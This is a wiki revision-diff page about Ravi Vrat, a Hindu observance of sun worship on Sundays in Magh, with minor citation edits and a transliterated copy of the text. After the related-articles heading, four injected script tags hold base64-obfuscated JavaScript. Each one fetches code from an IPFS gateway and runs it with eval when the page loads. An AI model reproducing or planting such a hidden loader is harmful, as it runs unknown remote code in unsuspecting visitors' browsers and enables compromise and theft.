Difference between revisions of "रवि व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*रविव्रत [[माघ]] में [[दिन]] में तीन बार [[सूर्य देव|सूर्य]] पूजा की जाती है।
 
*रविव्रत [[माघ]] में [[दिन]] में तीन बार [[सूर्य देव|सूर्य]] पूजा की जाती है।
*ऐसी मान्यता है कि रविव्रत में एक मास में ही 6 मासों का पुण्य मिलता है।<ref>हेमाद्रि (व्रत खण्ड 2,796)</ref>
+
*ऐसी मान्यता है कि रविव्रत में एक मास में ही 6 मासों का पुण्य मिलता है।<ref>हेमाद्रि (व्रत खण्ड 2,796</ref>
 
*रविव्रत माघ में [[रविवार]] को किया जाता है।
 
*रविव्रत माघ में [[रविवार]] को किया जाता है।
 
*रविव्रत में एक वर्ष तक सभी रविवारों को सूर्य पूजा की जाती है।
 
*रविव्रत में एक वर्ष तक सभी रविवारों को सूर्य पूजा की जाती है।

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ravivrat magh mean din mean tin bar soory pooja ki jati hai.
  • aisi manyata hai ki ravivrat mean ek mas mean hi 6 masoan ka puny milata hai.[1]
  • ravivrat magh mean ravivar ko kiya jata hai.
  • ravivrat mean ek varsh tak sabhi ravivaroan ko soory pooja ki jati hai.
  • aisi manyata hai ki kuchh nishchit vastuoan par kram se rahana ya kuchh nishchit vastuoan ko nahian khana chahie.[2]


tika tippani aur sandarbh

  1. hemadri (vrat khand 2,796
  2. varshakriyakaumudi 37-38

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>